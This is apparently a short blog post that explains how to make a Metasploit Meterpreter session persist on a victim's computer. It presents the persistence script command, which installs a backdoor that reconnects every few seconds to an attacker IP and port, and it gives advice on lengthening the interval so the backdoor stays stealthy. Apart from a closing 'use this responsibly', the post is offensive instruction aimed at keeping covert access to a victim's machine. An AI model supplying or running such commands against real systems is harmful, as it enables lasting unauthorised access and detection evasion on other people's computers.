I came across an interesting dilemma, whether we can use meterpreter as a proper persistence remote adminsitration tool.
When i started exploring, i found that we can indeed make meterpreter session persistence, i.e., when you disconnect your PC and connect back the connection connects back to your meterpreter exploit handler
Lets see how to do this
Assume you have created the meterpreter payload (elf or windows binary) and you have started your handler on the port of your choice
Assume we got the connection back after executing the meterpreter binary
At this point, we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection will be lost as long as it does not “visualize” the image again. To avoid this, we should use a Ruby script called “persistence” written by Carlos Perez. Showing the help:
run persistence -U -i 5 -p 4444 -r 192.168.1.36
That is, every time the victim starts the session, the backdoor will try to open the connection every 5 seconds to the address 192.168.1.36:4444. The interval to choose will depend on what the attacker wants, if you want it to be a bit more stealthy, maybe with 5 min it is fine, if the interval is small, it is more likely to be detected.
Cheers, use this responsibly
0 comments:
Post a Comment